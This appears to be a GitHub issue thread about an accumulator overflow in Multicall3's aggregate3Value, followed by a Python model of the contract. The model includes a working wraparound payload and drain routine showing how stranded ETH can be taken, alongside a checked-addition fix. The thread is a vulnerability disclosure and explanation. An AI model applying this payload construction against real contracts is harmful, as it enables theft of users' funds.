Closed algys closed 6 months ago
Thanks for reporting. This is a known issue (you can read more here), which is not a problem during normal usage but is a problem if you are relying on the contract to hold ETH, which is not the intended usage of the contract anyway. Consequently, the first bullet in the Security section of the README says:
Ensure it NEVER holds funds after a transaction ends. Any ETH, tokens, or other funds held by this contract can be stolen. There are bots that monitor for this and they will immediately steal any funds they find.
Going to close this; I don't think there's anything actionable here, but open to suggestions :)
There is a comment in the `aggregate3Value` method regarding `valAccumulator` overflow; it says that it will never overflow. However, in the case of multiple calls with a huge `calli.value` and `allowFailure=true`, the overflow is simply triggerable, since the call will return a `false` success flag that is ignored, but `valAccumulator` still increases after each faulty call. So a user can put an arbitrarily huge `calli.value` to trigger the overflow and bypass the `msg.value = SUM(call[0...i].value)` check.

https://github.com/mds1/multicall/blob/main/src/Multicall3.sol#L137-L145

It's not a really serious bug, but the comment leads to a wrong assumption about overflow. Also, I think if any native coin is remaining in the contract it can be drained.
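To make the report above concrete, the following Python model of the accumulator loop is added for this page; it is not code from the multicall repository or from either participant in the thread. The names `Call3Value`, `aggregate3_value`, `wraparound_payload`, `MULTICALL`, the attacker address and the wei figures are the model's own constructed assumptions. The two-call payload builds the wrap-around the report describes, and the `checked_add` flag shows, for comparison, the plain hardening of reverting when the accumulator would overflow.

```python
# Python model of the valAccumulator loop in Multicall3.aggregate3Value, written
# for this thread as an illustration; it is not the contract's code. Names such
# as Call3Value, aggregate3_value and MULTICALL are the model's own. Balances
# are a constructed in-memory dict of address -> wei.
from dataclasses import dataclass

MOD = 2**256                 # uint256 wraps modulo 2^256 inside unchecked {}
UINT256_MAX = MOD - 1
MULTICALL = "multicall3"     # hypothetical address of the deployed contract


@dataclass
class Call3Value:
    target: str
    allow_failure: bool
    value: int


class Revert(Exception):
    """Any revert: the caller's balances dict is left untouched."""


def low_level_call(balances, src, dst, value):
    """Model of CALL{value: v}: returns False (no transfer) if src cannot pay."""
    if balances.get(src, 0) < value:
        return False
    balances[src] -= value
    balances[dst] = balances.get(dst, 0) + value
    return True


def aggregate3_value(balances, sender, msg_value, calls, checked_add=False):
    """Returns (success flags, balances after the transaction) or raises Revert.

    checked_add=False mirrors `unchecked { valAccumulator += val; }`;
    checked_add=True is the hardened variant that reverts on overflow.
    """
    if balances.get(sender, 0) < msg_value:
        raise Revert("sender cannot fund msg.value")
    state = dict(balances)                       # work on a copy: revert == discard
    state[sender] -= msg_value
    state[MULTICALL] = state.get(MULTICALL, 0) + msg_value
    val_accumulator = 0
    results = []
    for c in calls:
        if not 0 <= c.value <= UINT256_MAX:
            raise Revert("value does not fit in uint256")
        if checked_add and val_accumulator + c.value > UINT256_MAX:
            raise Revert("accumulator overflow")
        val_accumulator = (val_accumulator + c.value) % MOD
        success = low_level_call(state, MULTICALL, c.target, c.value)
        if not success and not c.allow_failure:
            raise Revert("Multicall3: call failed")
        results.append(success)
    # Finally, make sure the msg.value = SUM(call[0...i].value)
    if msg_value != val_accumulator:
        raise Revert("Multicall3: value mismatch")
    return results, state


def wraparound_payload(msg_value, stranded):
    """The two-call sequence described in the report (constructed here).

    Call 0 asks for 2^256 - stranded wei: unpayable, so it fails, but with
    allowFailure=true the false flag is ignored and the accumulator still grows.
    Call 1 pays msg_value + stranded to the attacker; the accumulator wraps to
    exactly msg_value, so the final check passes and `stranded` leaves the contract.
    """
    assert 0 < stranded <= UINT256_MAX
    return [
        Call3Value("attacker", True, MOD - stranded),
        Call3Value("attacker", True, msg_value + stranded),
    ]


def run_drain(stranded, msg_value, checked_add=False):
    """Attacker-funded transaction against a contract holding `stranded` wei.

    Returns the balances after the transaction (unchanged if it reverted).
    """
    balances = {"attacker": msg_value, MULTICALL: stranded}
    try:
        _, after = aggregate3_value(balances, "attacker", msg_value,
                                    wraparound_payload(msg_value, stranded),
                                    checked_add=checked_add)
    except Revert:
        return balances
    return after


if __name__ == "__main__":
    one_eth = 10**18
    print("unchecked:", run_drain(5 * one_eth, one_eth))
    print("checked:  ", run_drain(5 * one_eth, one_eth, checked_add=True))
```

With the unchecked accumulator, the attacker pays 1 ETH of `msg.value`, the first call fails harmlessly, the second call pays out 6 ETH, and the final `msg.value` check still passes, so the 5 ETH that had been sitting in the contract is gone. With `checked_add=True` the second addition reverts and the balances are untouched. A single oversized call without the wrap-around, by contrast, is caught by the value-mismatch check, which is why the accumulator overflow is the part that matters in the report.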